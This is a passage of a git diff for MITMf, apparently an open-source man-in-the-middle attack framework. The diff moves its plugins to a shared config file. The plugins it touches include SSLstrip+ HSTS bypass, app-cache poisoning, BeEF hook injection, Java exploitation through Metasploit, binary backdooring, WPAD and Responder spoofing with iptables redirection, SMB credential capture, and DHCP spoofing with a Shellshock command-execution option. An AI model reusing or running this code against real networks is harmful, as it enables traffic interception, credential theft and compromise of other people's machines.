ConfigObj("./config/hsts_bypass.cfg") - - for k,v in hsts_config.items(): - self.sustitucion[k] = v - self.real[v] = k + self.hsts_config = None def isSecureLink(self, client, url): for expression in URLMonitor.javascriptTrickery: @@ -138,9 +132,19 @@ class URLMonitor: self.strippedURLs.add((client, url)) self.strippedURLPorts[(client, url)] = int(port) - def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,): + def setFaviconSpoofing(self, faviconSpoofing): self.faviconSpoofing = faviconSpoofing - self.hsts = hstsbypass + + def setHstsBypass(self, hstsconfig): + if hstsconfig: + self.hsts = True + self.hsts_config = hstsconfig + + for k,v in self.hsts_config.items(): + self.sustitucion[k] = v + self.real[v] = k + + def setClientLogging(self, clientLogging): self.clientLogging = clientLogging def isFaviconSpoofing(self): diff --git a/mitmf.py b/mitmf.py index fbea901..c9fdad5 100755 --- a/mitmf.py +++ b/mitmf.py @@ -15,7 +15,7 @@ except: sys.exit("[-] user_agents library not installed!") try: - import configobj + from configobj import ConfigObj except: sys.exit("[-] configobj library not installed!") @@ -29,21 +29,23 @@ sergio_version = "0.2.1" if __name__ == "__main__": parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') + #add MITMf options + mgroup = parser.add_argument_group("MITMf", "Options for MITMf") + mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") + mgroup.add_argument("-i", "--interface", type=str, metavar="interface" ,help="Interface to listen on") + mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.cfg", metavar='configfile', help="Specify config file to use") + mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies') #add sslstrip options - sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library") + sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library") #sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).") - sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") slogopts = sgroup.add_mutually_exclusive_group() slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") #slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet - sgroup.add_argument("-i", "--interface", type=str, required=True, metavar="interface" ,help="Interface to listen on") sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") - sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy') - sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass") #Initialize plugins plugins = [] @@ -69,6 +71,23 @@ if __name__ == "__main__": args = parser.parse_args() + try: + configfile = ConfigObj(args.configfile) + except Exception, e: + sys.exit("[-] Error parsing config file: " + str(e)) + + config_args = configfile['MITMf']['args'] + if config_args: + print "[*] Loading arguments from config file" + for arg in config_args.split(' '): + sys.argv.append(arg) + args = parser.parse_args() + + if not args.interface: + sys.exit("[-] -i , --interface argument is required") + + args.configfile = configfile #so we can pass the configobj down to all the plugins + log_level = logging.__dict__[args.log_level.upper()] #Start logging @@ -84,7 +103,7 @@ if __name__ == "__main__": print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version if ('--responder' and '--wpad') in sys.argv: args.listen = 3141 - print "[*] Listening on port 3141 since --wpad was passed" + print "[*] SSLstrip is now listening on port 3141 since --wpad was passed" load = [] try: @@ -103,7 +122,7 @@ if __name__ == "__main__": from libs.sslstrip.StrippingProxy import StrippingProxy from libs.sslstrip.URLMonitor import URLMonitor - URLMonitor.getInstance().setValues(args.favicon, args.hsts) + URLMonitor.getInstance().setFaviconSpoofing(args.favicon) CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py index 670633d..ed6436f 100644 --- a/plugins/AppCachePoison.py +++ b/plugins/AppCachePoison.py @@ -1,15 +1,14 @@ -# + # 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz -####################################################################################################### from plugins.plugin import Plugin from datetime import date from libs.sslstrip.URLMonitor import URLMonitor import logging -import ConfigParser import re import os.path import time +import sys class AppCachePlugin(Plugin): name = "App Cache Poison" @@ -21,24 +20,15 @@ class AppCachePlugin(Plugin): def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options - self.config_file = "./config/app_cache_poison.cfg" - self.config = None self.mass_poisoned_browsers = [] self.urlMonitor = URLMonitor.getInstance() + try: + self.config = options.configfile['AppCachePoison'] + except Exception, e: + sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e)) + print "[*] App Cache Poison plugin online" - self.createTamperer(self.config_file) - - def parseConfig(self, configFile): - config = ConfigParser.ConfigParser() - config.read(configFile) - readConfig = config._sections - readConfig.update(config.defaults()) - return readConfig - - def createTamperer(self, configFile): - logging.debug("Reading tamper config file: %s" % (configFile)) - self.config = self.parseConfig(configFile) def handleResponse(self, request, data): @@ -55,12 +45,12 @@ class AppCachePlugin(Plugin): urls = self.urlMonitor.getRedirectionSet(url) - (s,element,url) = self.getSectionForUrls(urls) - if not s: + (name,s,element,url) = self.getSectionForUrls(urls) + if s is False: data = self.tryMassPoison(url, data, headers, req_headers, ip) return {'request': request, 'data': data} - logging.debug("Found URL %s in section %s" % (url, s['__name__'])) + logging.debug("Found URL %s in section %s" % (url, name)) p = self.getTemplatePrefix(s) if element == 'tamper': logging.debug("Poisoning tamper URL with template %s" % (p)) @@ -160,12 +150,12 @@ class AppCachePlugin(Plugin): def getTemplatePrefix(self, section): if section.has_key('templates'): - return self.config['templates_path'] + '/' + section['templates'] - + return self.config['templates_path'] + '/' + section['templates'] + return self.getDefaultTemplatePrefix() def getDefaultTemplatePrefix(self): - return self.config['templates_path'] + '/default' + return self.config['templates_path'] + '/default' def getManifestUrl(self, section): return section.get("manifest_url",'/robots.txt') @@ -175,15 +165,16 @@ class AppCachePlugin(Plugin): for i in self.config: if isinstance(self.config[i], dict): #section section = self.config[i] + name = i if section.get('tamper_url',False) == url: - return (section, 'tamper',url) + return (name, section, 'tamper',url) if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): - return (section, 'tamper',url) + return (name, section, 'tamper',url) if section.get('manifest_url',False) == url: - return (section, 'manifest',url) + return (name, section, 'manifest',url) if section.get('raw_url',False) == url: - return (section, 'raw',url) + return (name, section, 'raw',url) - return (False,'',urls.copy().pop()) + return (None, False,'',urls.copy().pop()) diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 545502d..ca31bd4 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -9,11 +9,6 @@ import json import threading import libs.beefapi as beefapi -try: - from configobj import ConfigObj -except: - sys.exit('[-] configobj library not installed!') - requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message requests_log.setLevel(logging.WARNING) @@ -25,10 +20,17 @@ class BeefAutorun(Inject, Plugin): desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" def initialize(self, options): - self.options = options + self.options = options - beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF'] - userconfig = ConfigObj("./config/beefautorun.cfg") + try: + beefconfig = options.configfile['MITMf']['BeEF'] + except Exception, e: + sys.exit("[-] Error parsing BeEF options in config file: " + str(e)) + + try: + userconfig = options.configfile['BeEFAutorun'] + except Exception, e: + sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e)) self.Mode = userconfig['mode'] self.All_modules = userconfig["ALL"] diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py index ad130a4..646815a 100644 --- a/plugins/CacheKill.py +++ b/plugins/CacheKill.py @@ -2,7 +2,7 @@ from plugins.plugin import Plugin class CacheKill(Plugin): - name = "CacheKill Plugin" + name = "CacheKill" optname = "cachekill" desc = "Kills page caching by modifying headers" implements = ["handleHeader", "connectionMade"] diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 7f42365..7398a8d 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -88,7 +88,7 @@ class FilePwn(Plugin): #NOT USED NOW #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) - self.userConfig = ConfigObj("./config/filepwn.cfg") + self.userConfig = options.configfile['FilePwn'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] diff --git a/plugins/Inject.py b/plugins/Inject.py index 07d441f..db4c54c 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -3,6 +3,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Er from scapy.all import get_if_addr import time import re +import sys import argparse from plugins.plugin import Plugin from plugins.CacheKill import CacheKill diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index eea0f61..68c0c2a 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -9,7 +9,6 @@ import sys import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import get_if_addr -from configobj import ConfigObj requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message requests_log.setLevel(logging.WARNING) @@ -26,8 +25,15 @@ class JavaPwn(BrowserProfiler, Plugin): self.options = options self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit - msfcfg = ConfigObj('./config/mitmf.cfg')['Metasploit'] - self.javacfg = ConfigObj('./config/javapwn.cfg') + try: + msfcfg = options.configfile['MITMf']['Metasploit'] + except Exception, e: + sys.exit("[-] Error parsing Metasploit options in config file : " + str(e)) + + try: + self.javacfg = options.configfile['JavaPwn'] + except Exception, e: + sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) self.msfport = msfcfg['msfport'] self.rpcip = msfcfg['rpcip'] diff --git a/plugins/Responder.py b/plugins/Responder.py index b0e2a3a..07fb673 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -23,6 +23,11 @@ class Responder(Plugin): if os.geteuid() != 0: sys.exit("[-] Responder plugin requires root privileges") + try: + config = options.configfile['Responder'] + except Exception, e: + sys.exit('[-] Error parsing config for Responder: ' + str(e)) + try: self.ip_address = get_if_addr(options.interface) if self.ip_address == "0.0.0.0": @@ -32,16 +37,16 @@ class Responder(Plugin): print "[*] Responder plugin online" DnsCache.getInstance().setCustomAddress(self.ip_address) - DnsCache.getInstance().setCustomRes('wpad', self.ip_address) - DnsCache.getInstance().setCustomRes('ISAProxySrv', self.ip_address) - DnsCache.getInstance().setCustomRes('RespProxySrv', self.ip_address) + + for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']: + DnsCache.getInstance().setCustomRes(name, self.ip_address) if '--spoof' not in sys.argv: print '[*] Setting up iptables' os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen) - t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)) + t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config)) t.setDaemon(True) t.start() diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py index 64c55ce..9ca19e1 100644 --- a/plugins/SMBAuth.py +++ b/plugins/SMBAuth.py @@ -1,5 +1,9 @@ from plugins.plugin import Plugin from plugins.Inject import Inject +import sys +import logging +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy +from scapy.all import get_if_addr class SMBAuth(Inject, Plugin): @@ -11,10 +15,19 @@ class SMBAuth(Inject, Plugin): Inject.initialize(self, options) self.target_ip = options.host self.html_payload = self._get_data() + + if self.target_ip is None: + try: + self.target_ip = get_if_addr(options.interface) + if self.target_ip == "0.0.0.0": + sys.exit("[-] Interface %s does not have an IP address" % options.interface) + except Exception, e: + sys.exit("[-] Error retrieving interface IP address: %s" % e) + print "[*] SMBAuth plugin online" def add_options(self, options): - options.add_argument("--host", type=str, help="The ip address of your capture server") + options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]") def _get_data(self): return ''\ diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py new file mode 100644 index 0000000..07cc820 --- /dev/null +++ b/plugins/SSLstrip+.py @@ -0,0 +1,20 @@ +from plugins.plugin import Plugin +from libs.sslstrip.URLMonitor import URLMonitor +import sys + +class HSTSbypass(Plugin): + name = 'SSLstrip+' + optname = 'hsts' + desc = 'Enables SSLstrip+ for partial HSTS bypass' + has_opts = False + + def initialize(self, options): + self.options = options + + try: + config = options.configfile['SSLstrip+'] + except Exception, e: + sys.exit("[-] Error parsing config for SSLstrip+: " + str(e)) + + print "[*] SSLstrip+ plugin online" + URLMonitor.getInstance().setHstsBypass(config) diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 57f154e..c991cdd 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -20,7 +20,6 @@ from base64 import b64decode from urllib import unquote import binascii import random -from configobj import ConfigObj class Spoof(Plugin): @@ -93,7 +92,7 @@ class Spoof(Plugin): self.rand_number = [] self.dhcp_dic = {} - self.dhcpcfg = ConfigObj("./config/dhcp.cfg") + self.dhcpcfg = options.configfile['Spoof']['DHCP'] thread_target = self.dhcp_sniff thread_args = () @@ -109,9 +108,9 @@ class Spoof(Plugin): print "[*] DNS Tampering enabled" if self.dns: - self.dnscfg = ConfigObj("./config/dns.cfg") + self.dnscfg = options.configfile['Spoof']['DNS'] - self.hstscfg = ConfigObj("./config/hsts_bypass.cfg") + self.hstscfg = options.configfile['SSLstrip+'] if not self.manualiptables: os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE') @@ -334,7 +333,7 @@ class Spoof(Plugin): group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries') - options.add_argument('--shellshock', type=str, dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') + options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]') options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')